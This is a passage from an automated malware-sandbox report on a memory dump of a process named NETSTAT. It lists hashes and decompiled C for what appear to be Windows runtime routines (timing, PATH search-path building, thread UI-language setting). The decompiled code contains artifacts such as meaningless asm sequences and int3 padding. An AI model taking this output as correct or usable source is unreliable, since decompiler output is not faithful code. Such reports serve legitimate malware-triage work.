                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: _vswprintf_s
                • String ID:
                • API String ID: 677850445-0
                • Opcode ID: 562652dd39de8ca2af4e4fdb42f05e2d44e370d804ed46f3d6df162cafbd9a7f
                • Instruction ID: 45bf04e5e3adcbf8cc1c3eec558f26db093405748964789e628f62b2152c84c2
                • Opcode Fuzzy Hash: 562652dd39de8ca2af4e4fdb42f05e2d44e370d804ed46f3d6df162cafbd9a7f
                • Instruction Fuzzy Hash: C051EF75D043698EEF31CF69C880BFEBBB4AF00710F2441A9E959ABA82D7314941CB95
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 76%
                			E0337B944(signed int* __ecx, char __edx) {
                				signed int _v8;
                				signed int _v16;
                				signed int _v20;
                				char _v28;
                				signed int _v32;
                				char _v36;
                				signed int _v40;
                				intOrPtr _v44;
                				signed int* _v48;
                				signed int _v52;
                				signed int _v56;
                				intOrPtr _v60;
                				intOrPtr _v64;
                				intOrPtr _v68;
                				intOrPtr _v72;
                				intOrPtr _v76;
                				char _v77;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr* _t65;
                				intOrPtr _t67;
                				intOrPtr _t68;
                				char* _t73;
                				intOrPtr _t77;
                				intOrPtr _t78;
                				signed int _t82;
                				intOrPtr _t83;
                				void* _t87;
                				char _t88;
                				intOrPtr* _t89;
                				intOrPtr _t91;
                				void* _t97;
                				intOrPtr _t100;
                				void* _t102;
                				void* _t107;
                				signed int _t108;
                				intOrPtr* _t112;
                				void* _t113;
                				intOrPtr* _t114;
                				intOrPtr _t115;
                				intOrPtr _t116;
                				intOrPtr _t117;
                				signed int _t118;
                				void* _t130;
                
                				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                				_v8 =  *0x344d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                				_t112 = __ecx;
                				_v77 = __edx;
                				_v48 = __ecx;
                				_v28 = 0;
                				_t5 = _t112 + 0xc; // 0x575651ff
                				_t105 =  *_t5;
                				_v20 = 0;
                				_v16 = 0;
                				if(_t105 == 0) {
                					_t50 = _t112 + 4; // 0x5de58b5b
                					_t60 =  *__ecx |  *_t50;
                					if(( *__ecx |  *_t50) != 0) {
                						 *__ecx = 0;
                						__ecx[1] = 0;
                						if(E03377D50() != 0) {
                							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                						} else {
                							_t65 = 0x7ffe0386;
                						}
                						if( *_t65 != 0) {
                							E03428CD6(_t112);
                						}
                						_push(0);
                						_t52 = _t112 + 0x10; // 0x778df98b
                						_push( *_t52);
                						_t60 = E03399E20();
                					}
                					L20:
                					_pop(_t107);
                					_pop(_t113);
                					_pop(_t87);
                					return E0339B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                				}
                				_t8 = _t112 + 8; // 0x8b000cc2
                				_t67 =  *_t8;
                				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                				_t108 =  *(_t67 + 0x14);
                				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                				_t105 = 0x2710;
                				asm("sbb eax, edi");
                				_v44 = _t88;
                				_v52 = _t108;
                				_t60 = E0339CE00(_t97, _t68, 0x2710, 0);
                				_v56 = _t60;
                				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                					L3:
                					 *(_t112 + 0x44) = _t60;
                					_t105 = _t60 * 0x2710 >> 0x20;
                					 *_t112 = _t88;
                					 *(_t112 + 4) = _t108;
                					_v20 = _t60 * 0x2710;
                					_v16 = _t60 * 0x2710 >> 0x20;
                					if(_v77 != 0) {
                						L16:
                						_v36 = _t88;
                						_v32 = _t108;
                						if(E03377D50() != 0) {
                							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                						} else {
                							_t73 = 0x7ffe0386;
                						}
                						if( *_t73 != 0) {
                							_t105 = _v40;
                							E03428F6A(_t112, _v40, _t88, _t108);
                						}
                						_push( &_v28);
                						_push(0);
                						_push( &_v36);
                						_t48 = _t112 + 0x10; // 0x778df98b
                						_push( *_t48);
                						_t60 = E0339AF60();
                						goto L20;
                					} else {
                						_t89 = 0x7ffe03b0;
                						do {
                							_t114 = 0x7ffe0010;
                							do {
                								_t77 =  *0x3448628; // 0x0
                								_v68 = _t77;
                								_t78 =  *0x344862c; // 0x0
                								_v64 = _t78;
                								_v72 =  *_t89;
                								_v76 =  *((intOrPtr*)(_t89 + 4));
                								while(1) {
                									_t105 =  *0x7ffe000c;
                									_t100 =  *0x7ffe0008;
                									if(_t105 ==  *_t114) {
                										goto L8;
                									}
                									asm("pause");
                								}
                								L8:
                								_t89 = 0x7ffe03b0;
                								_t115 =  *0x7ffe03b0;
                								_t82 =  *0x7FFE03B4;
                								_v60 = _t115;
                								_t114 = 0x7ffe0010;
                								_v56 = _t82;
                							} while (_v72 != _t115 || _v76 != _t82);
                							_t83 =  *0x3448628; // 0x0
                							_t116 =  *0x344862c; // 0x0
                							_v76 = _t116;
                							_t117 = _v68;
                						} while (_t117 != _t83 || _v64 != _v76);
                						asm("sbb edx, [esp+0x24]");
                						_t102 = _t100 - _v60 - _t117;
                						_t112 = _v48;
                						_t91 = _v44;
                						asm("sbb edx, eax");
                						_t130 = _t105 - _v52;
                						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                							_t88 = _t102 - _t91;
                							asm("sbb edx, edi");
                							_t108 = _t105;
                						} else {
                							_t88 = 0;
                							_t108 = 0;
                						}
                						goto L16;
                					}
                				} else {
                					if( *(_t112 + 0x44) == _t60) {
                						goto L20;
                					}
                					goto L3;
                				}
                			}


                APIs
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0337B9A5
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                • String ID:
                • API String ID: 885266447-0
                • Opcode ID: d61fc24ebae563322c09f08b288ddf434bf6307cb054aec1f4bf14259343b6f3
                • Instruction ID: 5286abad6f26fcdf16e8f09d186935e005813a33dddc18b63e95917e1548510f
                • Opcode Fuzzy Hash: d61fc24ebae563322c09f08b288ddf434bf6307cb054aec1f4bf14259343b6f3
                • Instruction Fuzzy Hash: 96514675A08344CFC720EF29C4C092AFBF9BB88600F18896EF9959B354D735E844CB92
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E03382581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546912564) {
                				signed int _v8;
                				signed int _v16;
                				unsigned int _v24;
                				void* _v28;
                				signed int _v32;
                				unsigned int _v36;
                				void* _v37;
                				signed int _v40;
                				signed int _v44;
                				signed int _v48;
                				signed int _v52;
                				signed int _v56;
                				intOrPtr _v60;
                				signed int _v64;
                				signed int _v68;
                				signed int _v72;
                				signed int _v76;
                				signed int _v80;
                				signed int _t230;
                				signed int _t234;
                				void* _t235;
                				intOrPtr* _t236;
                				intOrPtr* _t237;
                				signed int _t240;
                				signed int _t242;
                				intOrPtr _t244;
                				signed int _t247;
                				signed int _t254;
                				signed int _t257;
                				signed int _t265;
                				signed int _t271;
                				signed int _t273;
                				intOrPtr* _t275;
                				signed int _t276;
                				unsigned int _t279;
                				signed int _t283;
                				signed int _t286;
                				signed int _t290;
                				intOrPtr _t302;
                				signed int _t311;
                				signed int _t313;
                				signed int _t314;
                				signed int _t318;
                				signed int _t319;
                				void* _t323;
                				signed int _t324;
                				signed int _t326;
                				signed int _t329;
                				void* _t330;
                				void* _t333;
                				void* _t334;
                
                				_t326 = _t329;
                				_t330 = _t329 - 0x4c;
                				_v8 =  *0x344d360 ^ _t326;
                				_push(__ebx);
                				_push(__esi);
                				_push(__edi);
                				_t318 = 0x344b2e8;
                				_v56 = _a4;
                				_v48 = __edx;
                				_v60 = __ecx;
                				_t279 = 0;
                				_v80 = 0;
                				asm("movsd");
                				_v64 = 0;
                				_v76 = 0;
                				_v72 = 0;
                				asm("movsd");
                				_v44 = 0;
                				_v52 = 0;
                				_v68 = 0;
                				asm("movsd");
                				_v32 = 0;
                				_v36 = 0;
                				asm("movsd");
                				_v16 = 0;
                				_t334 = (_v24 >> 0x0000001c & 0x00000003) - 1;
                				_t271 = 0x48;
                				_t300 = 0 | _t334 == 0x00000000;
                				_t311 = 0;
                				_v37 = _t334 == 0;
                				if(_v48 <= 0) {
                					L16:
                					_t45 = _t271 - 0x48; // 0x0
                					__eflags = _t45 - 0xfffe;
                					if(_t45 > 0xfffe) {
                						_t319 = 0xc0000106;
                						goto L32;
                					} else {
                						_t318 = L03374620(_t279,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t271);
                						_v52 = _t318;
                						__eflags = _t318;
                						if(_t318 == 0) {
                							_t319 = 0xc0000017;
                							goto L32;
                						} else {
                							 *(_t318 + 0x44) =  *(_t318 + 0x44) & 0x00000000;
                							_t50 = _t318 + 0x48; // 0x48
                							_t313 = _t50;
                							_t300 = _v32;
                							 *(_t318 + 0x3c) = _t271;
                							_t273 = 0;
                							 *((short*)(_t318 + 0x30)) = _v48;
                							__eflags = _t300;
                							if(_t300 != 0) {
                								 *(_t318 + 0x18) = _t313;
                								__eflags = _t300 - 0x3448478;
                								 *_t318 = ((0 | _t300 == 0x03448478) - 0x00000001 & 0xfffffffb) + 7;
                								E0339F3E0(_t313,  *((intOrPtr*)(_t300 + 4)),  *_t300 & 0x0000ffff);
                								_t300 = _v32;
                								_t330 = _t330 + 0xc;
                								_t273 = 1;
                								__eflags = _a8;
                								_t313 = _t313 + (( *_t300 & 0x0000ffff) >> 1) * 2;
                								if(_a8 != 0) {
                									_t265 = E033E39F2(_t313);
                									_t300 = _v32;
                									_t313 = _t265;
                								}
                							}
                							_t283 = 0;
                							_v16 = 0;
                							__eflags = _v48;
                							if(_v48 <= 0) {
                								L31:
                								_t319 = _v68;
                								__eflags = 0;
                								 *((short*)(_t313 - 2)) = 0;
                								goto L32;
                							} else {
                								_t271 = _t318 + _t273 * 4;
                								_v56 = _t271;
                								do {
                									__eflags = _t300;
                									if(_t300 != 0) {
                										_t230 =  *(_v60 + _t283 * 4);
                										__eflags = _t230;
                										if(_t230 == 0) {
                											goto L30;
                										} else {
                											__eflags = _t230 == 5;
                											if(_t230 == 5) {
                												goto L30;
                											} else {
                												goto L22;
                											}
                										}
                									} else {
                										L22:
                										 *_t271 =  *(_v60 + _t283 * 4);
                										 *(_t271 + 0x18) = _t313;
                										_t234 =  *(_v60 + _t283 * 4);
                										__eflags = _t234 - 8;
                										if(_t234 > 8) {
                											goto L56;
                										} else {
                											switch( *((intOrPtr*)(_t234 * 4 +  &M03382959))) {
                												case 0:
                													__ax =  *0x3448488;
                													__eflags = __ax;
                													if(__ax == 0) {
                														goto L29;
                													} else {
                														__ax & 0x0000ffff = E0339F3E0(__edi,  *0x344848c, __ax & 0x0000ffff);
                														__eax =  *0x3448488 & 0x0000ffff;
                														goto L26;
                													}
                													goto L108;
                												case 1:
                													L45:
                													E0339F3E0(_t313, _v80, _v64);
                													_t260 = _v64;
                													goto L26;
                												case 2:
                													 *0x3448480 & 0x0000ffff = E0339F3E0(__edi,  *0x3448484,  *0x3448480 & 0x0000ffff);
                													__eax =  *0x3448480 & 0x0000ffff;
                													__eax = ( *0x3448480 & 0x0000ffff) >> 1;
                													__edi = __edi + __eax * 2;
                													goto L28;
                												case 3:
                													__eax = _v44;
                													__eflags = __eax;
                													if(__eax == 0) {
                														goto L29;
                													} else {
                														__esi = __eax + __eax;
                														__eax = E0339F3E0(__edi, _v72, __esi);
                														__edi = __edi + __esi;
                														__esi = _v52;
                														goto L27;
                													}
                													goto L108;
                												case 4:
                													_push(0x2e);
                													_pop(__eax);
                													 *(__esi + 0x44) = __edi;
                													 *__edi = __ax;
                													__edi = __edi + 4;
                													_push(0x3b);
                													_pop(__eax);
                													 *(__edi - 2) = __ax;
                													goto L29;
                												case 5:
                													__eflags = _v36;
                													if(_v36 == 0) {
                														goto L45;
                													} else {
                														E0339F3E0(_t313, _v76, _v36);
                														_t260 = _v36;
                													}
                													L26:
                													_t330 = _t330 + 0xc;
                													_t313 = _t313 + (_t260 >> 1) * 2 + 2;
                													__eflags = _t313;
                													L27:
                													_push(0x3b);
                													_pop(_t262);
                													 *((short*)(_t313 - 2)) = _t262;
                													goto L28;
                												case 6:
                													__ebx =  *0x344575c;
                													__eflags = __ebx - 0x344575c;
                													if(__ebx != 0x344575c) {
                														_push(0x3b);
                														_pop(__esi);
                														do {
                															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                															E0339F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                															__edi = __edi + __eax * 2;
                															__edi = __edi + 2;
                															 *(__edi - 2) = __si;
                															__ebx =  *__ebx;
                															__eflags = __ebx - 0x344575c;
                														} while (__ebx != 0x344575c);
                														__esi = _v52;
                														__ecx = _v16;
                														__edx = _v32;
                													}
                													__ebx = _v56;
                													goto L29;
                												case 7:
                													 *0x3448478 & 0x0000ffff = E0339F3E0(__edi,  *0x344847c,  *0x3448478 & 0x0000ffff);
                													__eax =  *0x3448478 & 0x0000ffff;
                													__eax = ( *0x3448478 & 0x0000ffff) >> 1;
                													__eflags = _a8;
                													__edi = __edi + __eax * 2;
                													if(_a8 != 0) {
                														__ecx = __edi;
                														__eax = E033E39F2(__ecx);
                														__edi = __eax;
                													}
                													goto L28;
                												case 8:
                													__eax = 0;
                													 *(__edi - 2) = __ax;
                													 *0x3446e58 & 0x0000ffff = E0339F3E0(__edi,  *0x3446e5c,  *0x3446e58 & 0x0000ffff);
                													 *(__esi + 0x38) = __edi;
                													__eax =  *0x3446e58 & 0x0000ffff;
                													__eax = ( *0x3446e58 & 0x0000ffff) >> 1;
                													__edi = __edi + __eax * 2;
                													__edi = __edi + 2;
                													L28:
                													_t283 = _v16;
                													_t300 = _v32;
                													L29:
                													_t271 = _t271 + 4;
                													__eflags = _t271;
                													_v56 = _t271;
                													goto L30;
                											}
                										}
                									}
                									goto L108;
                									L30:
                									_t283 = _t283 + 1;
                									_v16 = _t283;
                									__eflags = _t283 - _v48;
                								} while (_t283 < _v48);
                								goto L31;
                							}
                						}
                					}
                				} else {
                					while(1) {
                						L1:
                						_t234 =  *(_v60 + _t311 * 4);
                						if(_t234 > 8) {
                							break;
                						}
                						switch( *((intOrPtr*)(_t234 * 4 +  &M03382935))) {
                							case 0:
                								__ax =  *0x3448488;
                								__eflags = __ax;
                								if(__ax != 0) {
                									__eax = __ax & 0x0000ffff;
                									__ebx = __ebx + 2;
                									__eflags = __ebx;
                									goto L53;
                								}
                								goto L14;
                							case 1:
                								L44:
                								_t300 =  &_v64;
                								_v80 = E03382E3E(0,  &_v64);
                								_t271 = _t271 + _v64 + 2;
                								goto L13;
                							case 2:
                								__eax =  *0x3448480 & 0x0000ffff;
                								__ebx = __ebx + __eax;
                								__eflags = __dl;
                								if(__dl != 0) {
                									__eax = 0x3448480;
                									goto L80;
                								}
                								goto L14;
                							case 3:
                								__eax = E0336EEF0(0x34479a0);
                								__eax =  &_v44;
                								_push(__eax);
                								_push(0);
                								_push(0);
                								_push(4);
                								_push(L"PATH");
                								_push(0);
                								L57();
                								__esi = __eax;
                								_v68 = __esi;
                								__eflags = __esi - 0xc0000023;
                								if(__esi != 0xc0000023) {
                									L10:
                									__eax = E0336EB70(__ecx, 0x34479a0);
                									__eflags = __esi - 0xc0000100;
                									if(__esi == 0xc0000100) {
                										_v44 = _v44 & 0x00000000;
                										__eax = 0;
                										_v68 = 0;
                										goto L13;
                									} else {
                										__eflags = __esi;
                										if(__esi < 0) {
                											L32:
                											_t208 = _v72;
                											__eflags = _t208;
                											if(_t208 != 0) {
                												L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t208);
                											}
                											_t209 = _v52;
                											__eflags = _t209;
                											if(_t209 != 0) {
                												__eflags = _t319;
                												if(_t319 < 0) {
                													L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t209);
                													_t209 = 0;
                												}
                											}
                											goto L36;
                										} else {
                											__eax = _v44;
                											__ebx = __ebx + __eax * 2;
                											__ebx = __ebx + 2;
                											__eflags = __ebx;
                											L13:
                											_t279 = _v36;
                											goto L14;
                										}
                									}
                								} else {
                									__eax = _v44;
                									__ecx =  *0x3447b9c; // 0x0
                									_v44 + _v44 =  *[fs:0x30];
                									__ecx = __ecx + 0x180000;
                									__eax = L03374620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                									_v72 = __eax;
                									__eflags = __eax;
                									if(__eax == 0) {
                										__eax = E0336EB70(__ecx, 0x34479a0);
                										__eax = _v52;
                										L36:
                										_pop(_t312);
                										_pop(_t320);
                										__eflags = _v8 ^ _t326;
                										_pop(_t272);
                										return E0339B640(_t209, _t272, _v8 ^ _t326, _t300, _t312, _t320);
                									} else {
                										__ecx =  &_v44;
                										_push(__ecx);
                										_push(_v44);
                										_push(__eax);
                										_push(4);
                										_push(L"PATH");
                										_push(0);
                										L57();
                										__esi = __eax;
                										_v68 = __eax;
                										goto L10;
                									}
                								}
                								goto L108;
                							case 4:
                								__ebx = __ebx + 4;
                								goto L14;
                							case 5:
                								_t267 = _v56;
                								if(_v56 != 0) {
                									_t300 =  &_v36;
                									_t269 = E03382E3E(_t267,  &_v36);
                									_t279 = _v36;
                									_v76 = _t269;
                								}
                								if(_t279 == 0) {
                									goto L44;
                								} else {
                									_t271 = _t271 + 2 + _t279;
                								}
                								goto L14;
                							case 6:
                								__eax =  *0x3445764 & 0x0000ffff;
                								goto L53;
                							case 7:
                								__eax =  *0x3448478 & 0x0000ffff;
                								__ebx = __ebx + __eax;
                								__eflags = _a8;
                								if(_a8 != 0) {
                									__ebx = __ebx + 0x16;
                									__ebx = __ebx + __eax;
                								}
                								__eflags = __dl;
                								if(__dl != 0) {
                									__eax = 0x3448478;
                									L80:
                									_v32 = __eax;
                								}
                								goto L14;
                							case 8:
                								__eax =  *0x3446e58 & 0x0000ffff;
                								__eax = ( *0x3446e58 & 0x0000ffff) + 2;
                								L53:
                								__ebx = __ebx + __eax;
                								L14:
                								_t311 = _t311 + 1;
                								if(_t311 >= _v48) {
                									goto L16;
                								} else {
                									_t300 = _v37;
                									goto L1;
                								}
                								goto L108;
                						}
                					}
                					L56:
                					asm("int 0x29");
                					asm("out 0x28, al");
                					__eflags =  *_t271 - _t234;
                					asm("o16 sub [eax], bh");
                					asm("daa");
                					 *_t271 - _t234 =  *[es:ebx] - _t234;
                					 *_t234 =  *_t234 - _t271;
                					_t235 = _t234 +  *0x1f033826;
                					_t275 = 0x25;
                					__eflags = _t235 - 3;
                					_t236 = _t330 + _t234;
                					_t333 = _t235;
                					 *_t236 =  *_t236 - _t275;
                					 *_t236 =  *_t236 - _t313;
                					_t237 = _t236 +  *((intOrPtr*)(_t236 - 0x9fcc7d8));
                					asm("daa");
                					__eflags =  *_t275 - _t237;
                					_push(ds);
                					 *_t237 =  *_t237 - _t275;
                					__eflags =  *_t275 - _t237;
                					asm("daa");
                					__eflags =  *_t275 - _t237;
                					asm("fcomp dword [ebx+0x3c]");
                					_t323 = _t318 + 1 +  *0x2033c5b +  *((intOrPtr*)(_t237 +  &_a1546912564));
                					__eflags = _t237 - 3;
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					_push(0x20);
                					_push(0x342ff00);
                					E033AD08C(_t275, _t313, _t323);
                					_v44 =  *[fs:0x18];
                					_t314 = 0;
                					 *_a24 = 0;
                					_t276 = _a12;
                					__eflags = _t276;
                					if(_t276 == 0) {
                						_t240 = 0xc0000100;
                					} else {
                						_v8 = 0;
                						_t324 = 0xc0000100;
                						_v52 = 0xc0000100;
                						_t242 = 4;
                						while(1) {
                							_v40 = _t242;
                							__eflags = _t242;
                							if(_t242 == 0) {
                								break;
                							}
                							_t290 = _t242 * 0xc;
                							_v48 = _t290;
                							__eflags = _t276 -  *((intOrPtr*)(_t290 + 0x3331664));
                							if(__eflags <= 0) {
                								if(__eflags == 0) {
                									_t257 = E0339E5C0(_a8,  *((intOrPtr*)(_t290 + 0x3331668)), _t276);
                									_t333 = _t333 + 0xc;
                									__eflags = _t257;
                									if(__eflags == 0) {
                										_t324 = E033D51BE(_t276,  *((intOrPtr*)(_v48 + 0x333166c)), _a16, _t314, _t324, __eflags, _a20, _a24);
                										_v52 = _t324;
                										break;
                									} else {
                										_t242 = _v40;
                										goto L62;
                									}
                									goto L70;
                								} else {
                									L62:
                									_t242 = _t242 - 1;
                									continue;
                								}
                							}
                							break;
                						}
                						_v32 = _t324;
                						__eflags = _t324;
                						if(_t324 < 0) {
                							__eflags = _t324 - 0xc0000100;
                							if(_t324 == 0xc0000100) {
                								_t286 = _a4;
                								__eflags = _t286;
                								if(_t286 != 0) {
                									_v36 = _t286;
                									__eflags =  *_t286 - _t314;
                									if( *_t286 == _t314) {
                										_t324 = 0xc0000100;
                										goto L76;
                									} else {
                										_t302 =  *((intOrPtr*)(_v44 + 0x30));
                										_t244 =  *((intOrPtr*)(_t302 + 0x10));
                										__eflags =  *((intOrPtr*)(_t244 + 0x48)) - _t286;
                										if( *((intOrPtr*)(_t244 + 0x48)) == _t286) {
                											__eflags =  *(_t302 + 0x1c);
                											if( *(_t302 + 0x1c) == 0) {
                												L106:
                												_t324 = E03382AE4( &_v36, _a8, _t276, _a16, _a20, _a24);
                												_v32 = _t324;
                												__eflags = _t324 - 0xc0000100;
                												if(_t324 != 0xc0000100) {
                													goto L69;
                												} else {
                													_t314 = 1;
                													_t286 = _v36;
                													goto L75;
                												}
                											} else {
                												_t247 = E03366600( *(_t302 + 0x1c));
                												__eflags = _t247;
                												if(_t247 != 0) {
                													goto L106;
                												} else {
                													_t286 = _a4;
                													goto L75;
                												}
                											}
                										} else {
                											L75:
                											_t324 = E03382C50(_t286, _a8, _t276, _a16, _a20, _a24, _t314);
                											L76:
                											_v32 = _t324;
                											goto L69;
                										}
                									}
                									goto L108;
                								} else {
                									E0336EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                									_v8 = 1;
                									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                									_t324 = _a24;
                									_t254 = E03382AE4( &_v36, _a8, _t276, _a16, _a20, _t324);
                									_v32 = _t254;
                									__eflags = _t254 - 0xc0000100;
                									if(_t254 == 0xc0000100) {
                										_v32 = E03382C50(_v36, _a8, _t276, _a16, _a20, _t324, 1);
                									}
                									_v8 = _t314;
                									E03382ACB();
                								}
                							}
                						}
                						L69:
                						_v8 = 0xfffffffe;
                						_t240 = _t324;
                					}
                					L70:
                					return E033AD0D1(_t240);
                				}
                				L108:
                			}























































                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: PATH
                • API String ID: 0-1036084923
                • Opcode ID: 7cef2b26a999245840f66087157ebce7c2dec472d02383b69277b4fa544f82c0
                • Instruction ID: e9a01f7af1c62150ea5a0063244a9336c85c9775abaa98b0e38ee0a01128e566
                • Opcode Fuzzy Hash: 7cef2b26a999245840f66087157ebce7c2dec472d02383b69277b4fa544f82c0
                • Instruction Fuzzy Hash: 4FC16C79D10319EBDB24EF99D8C0AAEB7B5FF48700F584429F801EB250E775A941CB64
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E0338FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                				char _v5;
                				signed int _v8;
                				signed int _v12;
                				char _v16;
                				char _v17;
                				char _v20;
                				signed int _v24;
                				char _v28;
                				char _v32;
                				signed int _v40;
                				void* __ecx;
                				void* __edi;
                				void* __ebp;
                				signed int _t73;
                				intOrPtr* _t75;
                				signed int _t77;
                				signed int _t79;
                				signed int _t81;
                				intOrPtr _t83;
                				intOrPtr _t85;
                				intOrPtr _t86;
                				signed int _t91;
                				signed int _t94;
                				signed int _t95;
                				signed int _t96;
                				signed int _t106;
                				signed int _t108;
                				signed int _t114;
                				signed int _t116;
                				signed int _t118;
                				signed int _t122;
                				signed int _t123;
                				void* _t129;
                				signed int _t130;
                				void* _t132;
                				intOrPtr* _t134;
                				signed int _t138;
                				signed int _t141;
                				signed int _t147;
                				intOrPtr _t153;
                				signed int _t154;
                				signed int _t155;
                				signed int _t170;
                				void* _t174;
                				signed int _t176;
                				signed int _t177;
                
                				_t129 = __ebx;
                				_push(_t132);
                				_push(__esi);
                				_t174 = _t132;
                				_t73 =  !( *( *(_t174 + 0x18)));
                				if(_t73 >= 0) {
                					L5:
                					return _t73;
                				} else {
                					E0336EEF0(0x3447b60);
                					_t134 =  *0x3447b84; // 0x77e07b80
                					_t2 = _t174 + 0x24; // 0x24
                					_t75 = _t2;
                					if( *_t134 != 0x3447b80) {
                						_push(3);
                						asm("int 0x29");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						_push(0x3447b60);
                						_t170 = _v8;
                						_v28 = 0;
                						_v40 = 0;
                						_v24 = 0;
                						_v17 = 0;
                						_v32 = 0;
                						__eflags = _t170 & 0xffff7cf2;
                						if((_t170 & 0xffff7cf2) != 0) {
                							L43:
                							_t77 = 0xc000000d;
                						} else {
                							_t79 = _t170 & 0x0000000c;
                							__eflags = _t79;
                							if(_t79 != 0) {
                								__eflags = _t79 - 0xc;
                								if(_t79 == 0xc) {
                									goto L43;
                								} else {
                									goto L9;
                								}
                							} else {
                								_t170 = _t170 | 0x00000008;
                								__eflags = _t170;
                								L9:
                								_t81 = _t170 & 0x00000300;
                								__eflags = _t81 - 0x300;
                								if(_t81 == 0x300) {
                									goto L43;
                								} else {
                									_t138 = _t170 & 0x00000001;
                									__eflags = _t138;
                									_v24 = _t138;
                									if(_t138 != 0) {
                										__eflags = _t81;
                										if(_t81 != 0) {
                											goto L43;
                										} else {
                											goto L11;
                										}
                									} else {
                										L11:
                										_push(_t129);
                										_t77 = E03366D90( &_v20);
                										_t130 = _t77;
                										__eflags = _t130;
                										if(_t130 >= 0) {
                											_push(_t174);
                											__eflags = _t170 & 0x00000301;
                											if((_t170 & 0x00000301) == 0) {
                												_t176 = _a8;
                												__eflags = _t176;
                												if(__eflags == 0) {
                													L64:
                													_t83 =  *[fs:0x18];
                													_t177 = 0;
                													__eflags =  *(_t83 + 0xfb8);
                													if( *(_t83 + 0xfb8) != 0) {
                														E033676E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                													}
                													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                													goto L15;
                												} else {
                													asm("sbb edx, edx");
                													_t114 = E033F8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                													__eflags = _t114;
                													if(_t114 < 0) {
                														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                														E0335B150();
                													}
                													_t116 = E033F6D81(_t176,  &_v16);
                													__eflags = _t116;
                													if(_t116 >= 0) {
                														__eflags = _v16 - 2;
                														if(_v16 < 2) {
                															L56:
                															_t118 = E033675CE(_v20, 5, 0);
                															__eflags = _t118;
                															if(_t118 < 0) {
                																L67:
                																_t130 = 0xc0000017;
                																goto L32;
                															} else {
                																__eflags = _v12;
                																if(_v12 == 0) {
                																	goto L67;
                																} else {
                																	_t153 =  *0x3448638; // 0x0
                																	_t122 = L033638A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                																	_t154 = _v12;
                																	_t130 = _t122;
                																	__eflags = _t130;
                																	if(_t130 >= 0) {
                																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                																		__eflags = _t123;
                																		if(_t123 != 0) {
                																			_t155 = _a12;
                																			__eflags = _t155;
                																			if(_t155 != 0) {
                																				 *_t155 = _t123;
                																			}
                																			goto L64;
                																		} else {
